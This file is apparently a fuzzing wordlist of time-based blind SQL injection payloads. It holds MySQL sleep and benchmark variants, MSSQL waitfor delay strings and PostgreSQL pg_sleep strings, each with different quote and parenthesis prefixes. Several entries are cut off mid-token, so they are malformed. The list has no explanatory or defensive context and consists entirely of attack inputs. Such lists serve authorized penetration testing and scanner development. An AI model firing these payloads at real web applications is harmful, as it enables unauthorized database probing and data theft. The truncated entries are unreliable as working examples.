sleep((30))#                  
;waitfor+delay+'0:0:(30)'--   
);waitfor+delay+'0:0:(30)'--  
';waitfor+delay+'0:0:(30)'--  
";waitfor+delay+'0:0:(30)'--  
');waitfor+delay+'0:0:(30)'-- 
");waitfor+delay+'0:0:(30)'-- 
));waitfor+delay+'0:0:(30)'-- 
'));waitfor+delay+'0:0:(30)'--
"));waitfor+delay+'0:0:(30)'--
+benchmark(10000000,MD(30)(1))
1+or+benchmark(10000000,MD(30)
"+or+benchmark(10000000,MD(30)
'+or+benchmark(10000000,MD(30)
1)+or+benchmark(10000000,MD(30
")+or+benchmark(10000000,MD(30
')+or+benchmark(10000000,MD(30
1))+or+benchmark(10000000,MD(3
"))+or+benchmark(10000000,MD(3
'))+or+benchmark(10000000,MD(3
%20pg_sleep((30))--           
1+or+pg_sleep((30))--         
"+or+pg_sleep((30))--         
'+or+pg_sleep((30))--         
1)+or+pg_sleep((30))--        
")+or+pg_sleep((30))--        
')+or+pg_sleep((30))--        
1))+or+pg_sleep((30))--       
"))+or+pg_sleep((30))--       
'))+or+pg_sleep((30))--       
sleep(30)#                    
1+or+sleep(30)#               
"+or+sleep(30)#               
'+or+sleep(30)#               
"+or+sleep(30)="              
'+or+sleep(30)='              
1)+or+sleep(30)#              
")+or+sleep(30)="             
')+or+sleep(30)='             
1))+or+sleep(30)#             
"))+or+sleep(30)="            
'))+or+sleep(30)='            
;waitfor+delay+'0:0:30'--     
);waitfor+delay+'0:0:30'--    
';waitfor+delay+'0:0:30'--    
";waitfor+delay+'0:0:30'--    
');waitfor+delay+'0:0:30'--   
");waitfor+delay+'0:0:30'--   
));waitfor+delay+'0:0:30'--   
'));waitfor+delay+'0:0:30'--  
"));waitfor+delay+'0:0:30'--  
,(select%20if(count(*)!=-1,ben
,(select%20if(count(*)!=-1,ben
,(select%20if(count(*)!=-1,ben
',(select%20if(count(*)!=-1,be
',(select%20if(count(*)!=-1,be
',(select%20if(count(*)!=-1,be
",(select%20if(count(*)!=-1,be
